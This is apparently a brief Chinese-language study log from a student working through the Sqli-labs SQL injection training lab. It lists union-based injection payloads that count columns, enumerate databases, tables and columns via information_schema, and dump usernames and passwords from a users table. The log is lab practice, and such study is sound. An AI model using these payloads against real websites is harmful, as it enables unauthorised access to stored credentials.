Sqli-labs刷题记录

第一题

 order by 3 // 查询列数
union select 1,2,3 // 查看显示位置
'--+ // 判断为单引号字符型注入， --+即注释
// 查询数据库名称
 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ 
// 查询数据表名
(select group_concat(table_name) from information_schema.tables where table_schema='security')
// 查询表中列的名称
select group_concat(column_name) from information_schema.columns where table_name='users'
// 查询用户名和密码
select group_concat(username) from security.users
select group_concat(password) from security.users

其中 group_concat() 函数可以将查询结果按一串字符表示。

差不多刷完了。刷得快吐了

懒得写

https://blog.zeddyu.info/2019/03/03/Sqli-lab速刷记录(1-53)

http://p0desta.com/2018/01/28/Sqli_labs%E9%80%9A%E5%85%B3%E6%96%87%E6%A1%A3/

第一个链接整理得蛮好的，不过只刷了53题；第二个链接有后面几道题的答案

OK，54题我得到了secret key， 却没办法提交。

后面继续看《白帽子讲web安全》

2020年5月1日

忘完了，真的是….尴尬